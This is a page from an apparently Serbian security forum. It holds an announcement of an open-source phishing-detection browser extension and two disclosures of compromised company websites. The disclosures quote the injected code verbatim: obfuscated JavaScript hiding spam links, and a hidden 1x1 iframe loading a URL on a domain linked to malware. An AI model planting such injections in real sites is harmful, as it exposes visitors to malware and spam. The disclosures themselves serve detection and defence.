Welcome, Guest |
You have to register before you can post on our site.
|
Latest Threads |
lovemel.rs - procurela ne...
Forum: Kompromitovani resursi
Last Post: milos_rs
9 hours ago
» Replies: 0
» Views: 30
|
EPS - "nezapamćeni hakers...
Forum: Kompromitovani resursi
Last Post: milos_rs
Yesterday, 07:08 PM
» Replies: 89
» Views: 33,177
|
patika, fashion, itd scam...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
Yesterday, 07:03 PM
» Replies: 87
» Views: 22,029
|
Javno objavljen kompromit...
Forum: Kompromitovani resursi
Last Post: milos_rs
Yesterday, 11:56 AM
» Replies: 0
» Views: 43
|
Kompromitovani nalozi zap...
Forum: Kompromitovani resursi
Last Post: VincaSec
05-07-2024, 06:04 PM
» Replies: 1
» Views: 71
|
Kompromitovan nalog zapos...
Forum: Kompromitovani resursi
Last Post: VincaSec
05-05-2024, 12:22 PM
» Replies: 0
» Views: 79
|
Zbog prevara građana Nema...
Forum: Vesti, zanimljivosti i razno
Last Post: milos_rs
05-02-2024, 05:13 PM
» Replies: 0
» Views: 155
|
kolekcija trenutnih spam ...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
05-01-2024, 11:07 PM
» Replies: 0
» Views: 149
|
Neželjeni i netraženi spa...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
05-01-2024, 07:27 PM
» Replies: 0
» Views: 50
|
Firma Digital Media se go...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
05-01-2024, 07:26 PM
» Replies: 0
» Views: 50
|
|
|
DeepPhish (browser extension) |
Posted by: bane - 09-29-2022, 02:19 AM - Forum: Alati, servisi i tutorijali
- Replies (21)
|
|
Pozdrav svima,
Neko vreme vec razmisljam da publishujem kod od jednog zanimljivog experimenta koji sam radio u slobodne dane.
U pitanju je Chrome extenzija koja se sastoji od dve funkcionalnosti, a to je detekcija i inspekcija sajtova u toku browsinga.
Detekcija se vrsi pomocu ML random forest algoritma koji je dovoljno lagan da se izvrsi u browseru u realnom vremenu sa pre-treniranim modelom.
Svaki sajt ima svoj score koji se utvrdjuje na osnovu analize source koda. Pored toga, ovaj plugin pamti ukoliko se sigurnosni score nekog sajta kroz vreme promeni na bolje ili na gore u slucaju defacinga itd. Dokument o phishing karakteristikama na osnovu kojeg je uradjena analiza je u repozitorijumu.
Sto se tice inspekcije, kroz kontekstualni meni, tj. na desni klik na background bilo kog sajta, dolazi se do "Inspect Page with DeepPhish" opcije.
Rezultat inspekcije kao i progres iste se prikazuje zajedno sa svim detektovanim featurima sajta. U pozadini se pored besplatnih alata koristi i API nekoliko poznatih sajtova koji daju info o domenu, dns-u, whois i drugim informacijama ... Za API kljuceve potrebno je samo registrovati se uglavnom je dovoljan free nalog, osim ukoliko pravite neuobicajeno veliki broj requestova.
U sustini ovo je bundle svega sto je meni padalo na pamet da je potrebno za pasivan defence i osnovnu inspekciju, bez da palim vise alata za jednu stvar.
Svi detalji, dataset, modeli i slike su u repou na githubu: https://github.com/Omodaka9375/DeepPhish
Mislim da je ovo ok alat u edukativne svrhe i da svako moze da ga prilagodi kako zeli, ubaci druge API-je, dodaje feature itd.
Ako nekom pomaze da ustedi malo vremena super
|
|
|
Sakrivene reklame na contractor.rs |
Posted by: 1van - 09-28-2022, 06:56 PM - Forum: Kompromitovani resursi
- No Replies
|
|
Detektovano u još u martu, server Loopia: https://twitter.com/ivanmarkovicsec/stat...4906699776.
Code: <div name="LcOkne" id="FQfMnG">
<a href="http://www.atleticoarezzo.it/">UGG Saldi</a>
<a href="http://www.associazionespazzavento.it/">Stivali UGG</a>
<a href="http://www.agendacultura.it/">UGG Saldi</a>
<a href="http://www.rumeniinitalia.it/">UGG Outlet</a>
<a href="http://www.anspilecce.it">Stivali UGG</a>
<a href="http://www.montanolucino-ut.it">UGG Outlet</a>
<a href="http://www.mtdirectionsk.it">Stivali UGG</a>
<a href="http://www.bkvietnam.dk/">UGG Sko</a>
<a href="http://www.altieco.dk/">UGG Australia</a>
<a href="http://www.vinboden.dk">Billige UGG</a>
<a href="/teletext/ralph-lauren-vaska.html" title="ralph lauren väska">ralph lauren väska</a>
<a href="/teletext/ralph-lauren-skjorta.html" title="ralph lauren skjorta">ralph lauren skjorta</a>
<a href="/teletext/ralph-lauren-jacka-herr.html" title="ralph lauren jacka herr">ralph lauren jacka herr</a>
<a href="/teletext/ralph-lauren-parfym-dam.html" title="ralph lauren parfym dam">ralph lauren parfym dam</a>
<a href="/teletext/polo-ralph-lauren-skor.html" title="polo ralph lauren skor">polo ralph lauren skor</a>
<a href="/teletext/ralph-lauren-skjorta-dam.html" title="ralph lauren skjorta dam">ralph lauren skjorta dam</a>
</div><script language="JavaScript">var _0x6977=["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x73\x74\x79\x6C\x65","\x46\x51\x66\x4D\x6E\x47","\x64\x69\x73\x70\x6C\x61\x79","\x6E\x6F\x6E\x65"];document[_0x6977[0]](_0x6977[2])[_0x6977[1]][_0x6977[3]]=_0x6977[4]</script>
</body>
Code: De-obfuscated code: var _0x6977 = ["getElementById", "style", "FQfMnG", "display", “none"];
Whois:
Quote:Registrant: Contractor D.O.O.
Address: Brdjanska 458, Ripanj, Beograd, Srbija
Registration number: 07487436
Tax ID (PIB): 101745588
Administrative contact: Ilmak D.O.O.
Address: Cincar Jankova 7, Beograd, Srbija
Technical contact: Loopia d.o.o.
Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Srbija
Registration number: 17503626
|
|
|
Zaboravljeni malware link na df.rs |
Posted by: 1van - 09-28-2022, 06:47 PM - Forum: Kompromitovani resursi
- No Replies
|
|
Detektovano još u Martu, server je Loopia: https://twitter.com/ivanmarkovicsec/stat...6026613761. Ako ovo nisu videli ko zna šta još ima tamo.
Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sajt u izradi</title>
</head>
<frameset rows="*">
<frame src="http://www.loopia.co.yu/under_construction/" />
</frameset>
</html>
<iframe heigth="1" width="1" frameborder="0" src="http://alcobro.net/t.php?id=3661989"></iframe>
Domen alcobro.net se spominje na više mesta ali npr. i ovde: https://github.com/stamparm/maltrail/blo...istory.txt.
Whois:
Quote:Registrant: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Registration number: 17588931
Tax ID (PIB): 103607506
Administrative contact: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Technical contact: Loopia D.O.O.
Address: Obrenovićeva bb, TPC KALČA C1/72, Niš, Srbija
Registration number: 17503626
|
|
|
cao svima |
Posted by: Aleksandar.Dj. - 09-28-2022, 09:44 AM - Forum: O Vama
- Replies (3)
|
|
Zdravo, na forum sam naisao putem Ivanovog posta na linkedin-u u vezi inficiranja mreze katastra ransomware-om.
Dugo sam u ITju ali sam za sigurnost krenuo tek skoro da se interesujem. Nedostaje mi vec duze neki dobar forum kao sto je bio stari elitesecurity npr.
Nadam se pametnim raspravama i pozdravljam sve.
|
|
|
|